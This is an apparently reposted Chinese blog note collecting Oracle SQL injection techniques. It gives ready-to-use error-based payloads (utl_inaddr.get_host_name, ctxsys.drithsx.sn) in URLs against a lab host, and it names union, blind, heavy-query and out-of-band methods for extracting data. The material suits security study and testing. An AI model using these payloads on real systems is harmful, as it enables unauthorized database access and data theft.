码迷,mamicode.com
首页 > 数据库 > 详细

Oracle 注入技巧收集

时间:2016-05-30 21:35:24      阅读:1161      评论:0      收藏:0      [点我收藏+]

标签:

---恢复内容开始---

一、报错注入

(1)爆用户名(适用于:Oracle8,9和10g):

http://192.168.2.10/ora2.php?name=1 and 1=utl_inaddr.get_host_name((select user from dual))--

(2)基于报错注入(适用于Oracle 11g)取信息:

ctxsys.drithsx.sn(1,(SQL语句))

例如:

http://192.168.2.10/ora1.php?name= and 1 = ctxsys.drithsx.sn(1,(select user from dual))--

二、无报错信息

可通过以下几种方式来实现提取数据:

  (1)联合查询;

  (2)盲注;

  (3)Heavy Queries

  (4)Out Of Band Channels(带外通道)

 

---恢复内容结束---

Oracle 注入技巧收集

标签:

原文地址:http://www.cnblogs.com/websec/p/5543866.html

(0)
(1)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!